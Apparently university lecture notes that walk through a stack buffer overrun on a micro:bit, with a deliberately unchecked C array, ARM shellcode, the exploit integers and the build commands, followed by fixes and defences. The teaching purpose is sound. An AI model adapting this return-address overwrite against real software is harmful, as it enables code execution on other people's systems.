Lecture 7 – Buffer overrun attacks (Digital Systems)
The victim
One day, an Oxford undergraduate was conscientiously doing his IP1 practical, using C and the micro:bit instead of Scala and some bloated AMD64 machine with gigabytes of RAM. Here is the code that he wrote:
/* getnum -- read a line of input and convert to a number */
int getnum(void)
{
    char buf[64];
    getline(buf);
    return atoi(buf);
}

void init(void)
{
    int n = 0, total;
    int data[10];

    serial_init();
    printf("Enter numbers, 0 to finish\n");
    while (1) {
        int x = getnum();
        if (x == 0) break;
        data[n++] = x;
    }

    total = 0;
    for (int i = 0; i < n; i++)
        total += data[i];
    printf("Total = %d\n", total);
}
That doesn't look too bad, does it? There's a subroutine getnum that reads a line of input and converts it into a number, and the main program uses it to read a sequence of numbers and store them in an array. Finally, the program adds together all of the numbers and prints the total. But already this program contains a horrendous bug, which will allow us, by feeding it carefully crafted input, to subvert it and run any code that we like. To show our power, we will force the program to print the string HACKED!! repeatedly.
The flaw in the program is that it doesn't check that the input contains at most 10 numbers, and continues to accept and store numbers even when the array is full. It is this weakness we shall exploit.
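For contrast, here is a minimal sketch of what the missing check might look like. The names store_checked, total_checked and MAX_DATA are invented for illustration and are not part of the practical; the sketch takes its inputs from an array rather than the serial port so that it can be run on any machine.

```c
#include <assert.h>
#include <stddef.h>

#define MAX_DATA 10   /* capacity of the data array in init */

/* Store x at data[*n] and advance *n, but only if there is room.
   Returns 1 on success, 0 if the array is already full.
   (Hypothetical helper, not part of the original program.) */
int store_checked(int data[], size_t cap, size_t *n, int x)
{
    assert(data != NULL && n != NULL);
    if (*n >= cap)
        return 0;               /* refuse to write past the end */
    data[(*n)++] = x;
    return 1;
}

/* Run the input loop over a prepared sequence of numbers, stopping at
   a 0 or when the array is full, and return the total as init would. */
int total_checked(const int *inputs, size_t count)
{
    int data[MAX_DATA];
    size_t n = 0;
    int total = 0;

    for (size_t i = 0; i < count && inputs[i] != 0; i++)
        if (!store_checked(data, MAX_DATA, &n, inputs[i]))
            break;              /* array full: ignore the rest */

    for (size_t i = 0; i < n; i++)
        total += data[i];
    return total;
}
```

With this check in place, the eleventh and later numbers are simply dropped instead of being written beyond the array.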
Context
This sort of sloppy programming is very common in C. It does little damage if the program is quickly written, used only locally, and quickly discarded. In other contexts, as we'll see, more care is very much needed to avoid security problems. There is actually another, more insidious, problem in the program, and that is the interface of the routine getline, which takes as a parameter the address of a character array to store the line, but has no way of knowing how big that array is, and so cannot guard against overflowing it. Routines in the C library such as gets – the same as getline here – are rightly deprecated for their unsafety. There's an alternative function fgets(buf, n, fp) that can read from an arbitrary file fp, not just the standard input, but crucially also accepts the maximum number of characters n that will fit in buf.
Mounting the attack
Used ordinarily, the program fulfils its purpose.
Enter numbers, ending with 0
> 123
> 456
> 7
> 0
Total = 586
After printing the total, the program ends, and we must press reset to use it again. But now let's try another sequence of 14 numbers.
Enter numbers, ending with 0
> -1610370930
> 1200113921
> 59387
> 1217
> 1262698824
> 555828293
> 32
> 1
> 1
> 1
> 1
> 1
> 1
> 536887217
> 0
As you will see, the program runs haywire, printing the same message over and over again. (In the lecture, I used a helper program squirt running on the host computer to automate typing in the numbers – but given enough patience it can be done by hand.)
Analysing the attack
So what are those 14 magic numbers, and how were they determined?
First, we notice that there are 14 numbers, and the buffer declared locally in init has space for only 10 numbers. The first 10 numbers that are input fill up the data array, and the remaining four are written by the program into the space beyond the array, overwriting whatever the program was storing there. To understand what is overwritten, and how this leads to subversion of the program, we need to look at the layout of init's stack frame.
     +--------------------------------+
     |  Return address                |
     +--------------------------------+
     |  Saved R5 value                |
     +--------------------------------+
     |  Saved R4 value                |
     +--------------------------------+
     |  One word of padding           |
     +--------------------------------+
     |                                |
     |  10 words for data array       |
sp:  |                                |
     +--------------------------------+
We can deduce the layout of init's frame by looking at its code, obtained by disassembling the program. The code begins like this:
00000224 <init>:
 224:   b530        push    {r4, r5, lr}
 226:   b08b        sub     sp, #44         ; 0x2c
 228:   f7ff ff4a   bl      c0 <serial_init>
 22c:   480d        ldr     r0, [pc, #52]   ; (264 <init+0x40>)
 22e:   f000 f947   bl      4c0 <printf>
 232:   2400        movs    r4, #0
 234:   f7ff ffec   bl      210 <getnum>
 238:   2800        cmp     r0, #0
 23a:   d004        beq.n   246 <init+0x22>
 23c:   00a3        lsls    r3, r4, #2
 23e:   466a        mov     r2, sp
 240:   5098        str     r0, [r3, r2]
 242:   3401        adds    r4, #1
 244:   e7f6        b.n     234 <init+0x10>
The function begins by saving three registers, then subtracting 44 from the stack pointer, enough space for the 40-byte data array, plus four bytes of padding that are included so as to keep the stack pointer a multiple of eight in obedience to the ARM calling convention.
The local variable n lives in register r4, and later in the function, the statement data[n++] = x is translated into the four instructions starting with lsls at address 0x23c: first r3 is set to 4*n, then r2 is set to the value of sp, and x, currently resident in r0, is stored into an address formed by adding r2 and r3, just as we would expect if the array begins at the stack pointer as the picture shows.
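To make the picture concrete, the frame can be modelled as a C struct and the address calculation replayed by hand. This is only a sketch: the names init_frame, element_address and slot_hit are made up for the purpose, each stack slot is represented by a uint32_t, and the stack pointer value 0x20003fb0 used in the usage note is the one captured with the debugger later in these notes.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Model of init's stack frame, lowest address first.  Every slot on
   the Cortex-M0 stack is one 32-bit word. */
struct init_frame {
    uint32_t data[10];      /* sp points here */
    uint32_t padding;       /* keeps sp a multiple of 8 */
    uint32_t saved_r4;
    uint32_t saved_r5;
    uint32_t return_addr;   /* saved lr */
};

enum slot { SLOT_DATA, SLOT_PADDING, SLOT_R4, SLOT_R5, SLOT_RETURN };

/* Address computed by the instructions at 0x23c to 0x240 for data[n]:
   r3 = n << 2, r2 = sp, store at r2 + r3.  There is no bounds check. */
uint32_t element_address(uint32_t sp, uint32_t n)
{
    return sp + (n << 2);
}

/* Which part of the frame does a store to data[n] land on? */
enum slot slot_hit(uint32_t n)
{
    size_t off = (size_t)n * sizeof(uint32_t);
    assert(off < sizeof(struct init_frame));
    if (off < offsetof(struct init_frame, padding))     return SLOT_DATA;
    if (off < offsetof(struct init_frame, saved_r4))    return SLOT_PADDING;
    if (off < offsetof(struct init_frame, saved_r5))    return SLOT_R4;
    if (off < offsetof(struct init_frame, return_addr)) return SLOT_R5;
    return SLOT_RETURN;
}
```

For example, slot_hit(13) is SLOT_RETURN, and element_address(0x20003fb0, 13) gives 0x20003fe4: the fourteenth number typed in lands exactly on the saved return address.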
Is it fair to disassemble the target program and use this information to mount our attack? Yes, of course: in real life, we might be attacking a particular release of [a popular web browser], and we can download the code and study it to our heart's content, EULA notwithstanding.
OK, we will make our attack string contain 10 integers to fill up the buffer, another three integers to overwrite the next three words of the stack, and then one more integer that will overwrite the return address of init with a value of our choosing. By doing this, we can arrange that when init returns, it will be to a place that we can control. We'll choose that place to be the buffer itself, and arrange that the data put in the buffer is the code we'd like to run. But where will the buffer be in memory? We can find that out by running the program on a test machine with the debugger, stopping it in init, and writing down the value of the stack pointer. That will allow us to calculate the address of each part of our attack string once it is copied into the data array by the victim. In a more complicated program, different calls to init might be made in different contexts, and there may be several possible values for the stack pointer; here there is only one.
The layout we plan for the attack string is like this:
40 bytes of code
Another 12 bytes of padding
Address of the code
There's one more piece of information we need to formulate the attack string, and that's the address of the subroutine printf, which we can use to print our message (and a ransom note). We can find that by disassembling the program or by looking in the map file output by the linker. If our target is open source, we can get all this information freely; if not, we might need to poke about a bit more with a disassembler, but it's not rocket science.
After the stack frame of init has been overwritten by the input loop, the rest of init runs as usual: the total of the 14 numbers we have input is computed and printed. Then init returns to our chosen return address, and the code we placed in the buffer starts to run.
Context
The layout of the stack frame for init is typical of many machines. Details will differ: for example, we can expect the return address to appear at different offsets from the start of the buffer. What most buffer overrun attacks have in common is that the return address of a subroutine can be overwritten by overflowing a buffer embedded in the stack frame.
Building a binary
We could piece together the attack string byte by byte, hardware manual in hand. But it's neater to use the assembler: here's the assembly language source for what we want, including the addresses we determined earlier:
        .equ printf, 0x4c0          @ Address of printf
        .equ frame, 0x20003fb0      @ Captured stack pointer value in init

        .text
attack:
        sub sp, #56                 @ 0: Reserve stack space again
again:
        adr r0, message             @ 2: Address of our message
        ldr r1, =printf+1           @ 4: Absolute address for call
        blx r1                      @ 6: Call printf
        b again                     @ 8: Spin forever
        .pool                       @ 12: constant pool
message:
        .asciz "HACKED!! "          @ 16: string -- 10 bytes
        .balign 4, 0                @ pad to 28 bytes
        .word 1, 1, 1, 1            @ 28: fill up to 44 bytes
        .word 1, 1                  @ 44: Saved r4, r5
        .word frame+1               @ 52: Faked return address
                                    @ Total size 56
By the time this code is reached, init will have deallocated the stack space that was used for the buffer, so the first task is to adjust the stack pointer, so that when we later call printf, its stack frame will not overwrite our code. Then there is a call that passes the message to printf, for simplicity calling it by first putting its absolute address in a register; the +1 is to mark it as Thumb code.[1] Then the code enters an infinite loop while we wait for the ransom to be sent – in Bitcoin, naturally.
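The arithmetic behind the two +1 adjustments and the initial sub sp, #56 can be checked with a few lines of C. This is a sketch with invented names (thumb_target, sp_on_arrival, sp_after_adjust); it assumes that init's epilogue exactly undoes its prologue, so that the whole 56-byte frame has been freed by the time our code gains control.

```c
#include <assert.h>
#include <stdint.h>

#define PRINTF_ADDR 0x000004c0u  /* printf, from the disassembly */
#define FRAME_ADDR  0x20003fb0u  /* value of sp captured in init */
#define FRAME_SIZE  56u          /* 44 bytes of locals + 3 saved registers */

/* Form a value suitable for loading into pc with blx or pop: the
   address of some Thumb code with the least significant bit set. */
uint32_t thumb_target(uint32_t addr)
{
    assert((addr & 1u) == 0);   /* Thumb instructions are halfword aligned */
    return addr | 1u;
}

/* Value of sp when our code gains control, ASSUMING init's epilogue
   mirrors its prologue and frees the whole frame. */
uint32_t sp_on_arrival(void)
{
    return FRAME_ADDR + FRAME_SIZE;
}

/* Value of sp after the first instruction of the attack, sub sp, #56. */
uint32_t sp_after_adjust(void)
{
    return sp_on_arrival() - 56u;
}
```

Here thumb_target(PRINTF_ADDR) is 1217 and thumb_target(FRAME_ADDR) is 536887217, the fourth and fourteenth numbers of the attack string; and sp_after_adjust() comes back to FRAME_ADDR, so anything printf pushes goes below our code rather than on top of it.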
Some details to dispel any mystery:
- The adr instruction assembles into an instruction add r0, pc, #n that sets r0 to the address of the message: the assembler determines the value of n.
- The directive .pool places the constant printf+1 here in memory and fixes up the earlier ldr = instruction to refer to it.
- The directive .asciz stores the characters of our message, terminated C-style with a zero byte.
- The directive .balign 4, 0 pads the program with zero bytes (0) until its size is a multiple of 4.
- Each .word directive contributes a four-byte word to the output of the assembler.
- The .equ directives give the numeric value of the symbols printf and frame, obtained in earlier experiments.
- We use a blx reg instruction instead of bl label just because it's marginally inconvenient to determine the displacement for bl, and an absolute address is easier to deal with.
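The values the assembler chooses for adr and for the ldr = fix-up follow a simple rule: in Thumb code, pc reads as the address of the current instruction plus 4, and that value is rounded down to a multiple of 4 before the offset is added. The function pc_relative below is a made-up name for a sketch of that rule, not something taken from the toolchain.

```c
#include <assert.h>
#include <stdint.h>

/* Address referred to by a Thumb "add r0, pc, #imm" (adr) or
   "ldr rN, [pc, #imm]" located at insn_addr. */
uint32_t pc_relative(uint32_t insn_addr, uint32_t imm)
{
    assert((insn_addr & 1u) == 0);      /* instructions are halfword aligned */
    uint32_t pc = insn_addr + 4;        /* pc reads 4 bytes ahead */
    return (pc & ~(uint32_t)3) + imm;   /* word-align, then add the offset */
}
```

For the attack code, pc_relative(2, 12) is 16, the offset of message, and pc_relative(4, 4) is 12, the offset of the constant pool entry holding printf+1. The same rule accounts for the ldr r0, [pc, #52] at 0x22c in init, which refers to address 0x264.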
There's a makefile that automates the process of building the demonstration. First, we can assemble the file attack.s into an object file attack.o.
arm-none-eabi-as -mcpu=cortex-m0 -mthumb attack.s -o attack.o
Next, we use objcopy to turn the .o file into a binary image.
arm-none-eabi-objcopy -O binary attack.o attack.bin
Then we can use the (slightly misnamed) hexdump utility to format the binary data as a sequence of decimal integers.
hexdump -v -e '/4 "%d\n"' attack.bin >attack
The file attack then contains the 14 lines shown earlier as input to the victim program. There's a little program squirt that runs on the host and outputs the text like keystrokes to the serial interface of the micro:bit.
Disassembling the file attack.o shows the correspondence between the input to the assembler and the 14 integers that make up the attack string.
00000000 <attack>:
   0:   b08e        sub     sp, #56         ; 0x38
   2:   a003        add     r0, pc, #12     ; (adr r0, 10 <message>)
   4:   4901        ldr     r1, [pc, #4]    ; (c <attack+0xc>)
   6:   4788        blx     r1
   8:   e7fb        b.n     2 <attack+0x2>
   a:   0000        .short  0x0000
   c:   000004c1    .word   0x000004c1

00000010 <message>:
  10:   4b434148    .word   0x4b434148
  14:   21214445    .word   0x21214445
  18:   00000020    .word   0x00000020
  1c:   00000001    .word   0x00000001
  20:   00000001    .word   0x00000001
  24:   00000001    .word   0x00000001
  28:   00000001    .word   0x00000001
  2c:   00000001    .word   0x00000001
  30:   00000001    .word   0x00000001
  34:   20003fb1    .word   0x20003fb1
For example, the first integer is -1610370930, and that is the (signed) value of the bitstring 0xa003b08e.
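The conversion that hexdump performs here can be sketched in C: take four consecutive bytes of the image, least significant first, and read them as a signed 32-bit number. The function name word_at is invented for this illustration; the bytes in the usage note are the first two instruction halfwords b08e and a003 as they are laid out in memory on the little-endian Cortex-M0.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Read the index'th 32-bit word of a little-endian binary image and
   return it as a signed integer, as hexdump's %d format would show it. */
int32_t word_at(const uint8_t *image, size_t index)
{
    assert(image != NULL);
    const uint8_t *p = image + 4 * index;
    uint32_t u = (uint32_t)p[0]
               | (uint32_t)p[1] << 8
               | (uint32_t)p[2] << 16
               | (uint32_t)p[3] << 24;

    /* Convert to two's complement without relying on
       implementation-defined unsigned-to-signed conversion. */
    if (u & 0x80000000u)
        return (int32_t)(u & 0x7fffffffu) - INT32_MAX - 1;
    return (int32_t)u;
}
```

Given the bytes 8e b0 03 a0 01 49 88 47, word_at returns -1610370930 for index 0 and 1200113921 for index 1, matching the first two lines of the attack string.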
It's possible to use the debugger to capture the precise moment when the pc jumps to an unexpected value. Another page has a (manual) script to follow.
Defence against the dark arts
This example shows just how easy it is to write code with accidental vulnerabilities. There are many things that can be done to prevent such vulnerabilities from being exposed.
- We could use a programming language that supports checking of array bounds, and makes it difficult to pass around the addresses of buffers without also passing and checking their size.
- This attack depends on executing code that has been received as data: in the example, that code is stored in the region of memory that is used for the stack. On machines more sophisticated than the micro:bit, it's often possible to forbid executing code from anywhere but the code segment of the program.
- Even microcontrollers that have separate address spaces for program and data make it difficult to accidentally execute data as instructions. Nevertheless, there has to be some way of doing it, or such microcontrollers would not be able to update their own firmware under program control, and that is a useful feature.
- The attack depended on knowing a couple of addresses – the address of the init stack frame and the address of the existing printf subroutine. By randomising the layout of memory for each run of the program, it can be made more difficult to predict where such things will be found.
Linux has at least some of these defences enabled by default, and repeating the attack there is rather more difficult.
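Short of changing language, the first defence in the list can be approximated in C by never passing a buffer without its size. Here is a minimal sketch of a replacement for getnum built on the standard fgets; the name getnum_bounded and its interface are assumptions made for illustration, and on the micro:bit the serial routines would need an equivalent size-aware read in place of fgets.

```c
#include <assert.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Read one line from fp into buf, which has room for size bytes, and
   convert it to a number.  Returns 1 on success, 0 at end of input.
   (Hypothetical interface, not part of the original program.) */
int getnum_bounded(FILE *fp, char *buf, size_t size, long *out)
{
    assert(fp != NULL && buf != NULL && out != NULL && size >= 2);

    /* fgets stores at most size-1 characters plus a terminating zero */
    if (fgets(buf, (int)size, fp) == NULL)
        return 0;

    /* If the line did not fit, discard the rest of it so that the
       next call starts on a fresh line */
    if (strchr(buf, '\n') == NULL) {
        int c;
        while ((c = getc(fp)) != EOF && c != '\n')
            ;
    }

    *out = strtol(buf, NULL, 10);
    return 1;
}
```

A caller would write getnum_bounded(stdin, buf, sizeof buf, &x), so that the size travels with the buffer. An over-long line is truncated rather than allowed to spill into neighbouring memory.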
[1] That is to say, the blx r1 instruction on bigger ARM processors is capable of switching between native ARM and Thumb modes, according to the least significant bit in the register r1 – that is the significance of the x in the mnemonic blx. The function printf is in Thumb code, so even on the Cortex-M0, we must carefully keep the processor in Thumb mode when calling it: hence the +1. For the same reason, the return address we plant in place of init's original return address also has a +1.